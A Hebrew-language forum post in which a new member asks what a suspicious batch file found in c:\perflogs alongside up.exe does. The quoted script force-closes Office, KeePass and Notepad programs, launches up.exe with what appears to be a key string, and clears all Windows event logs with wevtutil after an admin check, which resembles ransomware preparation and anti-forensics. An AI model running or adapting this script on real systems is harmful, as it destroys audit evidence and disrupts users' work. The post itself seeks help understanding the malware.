קוד זדוני

Guman1973

New member
שלום

בהנחה שזו שאלה לגיטימית פה, - מה עושה הקוד הזה?
=========================================
taskkill /F /IM outlook.exe
taskkill /F /IM WINWORD.exe
taskkill /F /IM POWERPNT.exe
taskkill /F /IM EXCEL.exe
taskkill /F /IM KeePass.exe
taskkill /F /IM Notepad++.exe
taskkill /F /IM Notepad.exe

c:\perflogs\up.exe U27Ushsq8SeagCmaJd4D8UXMxsU9gW9

echo 1111 > c:\perflogs\q.txt
@echo off

FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo All Event Logs have been cleared!
goto theEnd

:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof

:noAdmin
echo Current user permissions to execute this .BAT file are inadequate.
echo This .BAT file must be run with administrative privileges.
echo Exit now, right click on this .BAT file, and select "Run as administrator".
pause >nul

:theEnd
Exit
=====================

ה-BAT הזה ו-up.exe היו ב-c:\perflogs

1. למה הוא סוגר את התוכנות?
2. מה זה רצף התווים בהפעלת up.exe
3. מה עושות הלולאות?

תודה רבה מראש
 
למעלה